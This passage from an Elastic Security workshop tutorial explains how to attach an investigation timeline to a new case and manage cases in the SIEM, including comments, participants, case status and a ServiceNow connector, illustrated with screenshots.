At the top right of the timeline, you'll notice a cog wheel. Click on it, and select `Attach timeline to new case`.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/timelinecaseoption.png)

You'll notice we're taken to the `Create new case` screen. Here we can give our case a name, assign any tags and a description - once again, markdown is supported. You will notice our timeline is already linked, but we have an option to include any other timeline as necessary:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/createanewcase.png)

Add some details to the case and click on `Create case` when ready.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/casedetailsscreen.png)

With a case view, there are a few things to note. 

* Each comment box supports markdown and adding timelines

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/commentbox.png)

* As other users collaborate on this case, they will show up in the participants list. The reported is also specified:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/reporterandparticipants.png)

* The case status is tracked, as well as how long it has been opened for. There is also a `Close case` button, as well as an action menu item to delete it:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/casestatus.png)

* Cases also supports native integration with [ServiceNow ITSM](https://www.servicenow.com/content/dam/servicenow-assets/public/en-us/doc-type/resource-center/data-sheet/ds-itsm.pdf). As you comment on a case, they can be pushed as part of a ServiceNow incident.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/servicenow.png)

To set up a ServiceNow connector, you will need to do this from the main cases menu under `Edit external connection`

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/externalconn.png)

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/configuresn.png)

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/snconnector.png)

* If you navigate back to the main cases screen, you will be able to get a list of active cases with their details. Like other parts of the SIEM, bulk actions can be taken for cases.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/caseslist.png)


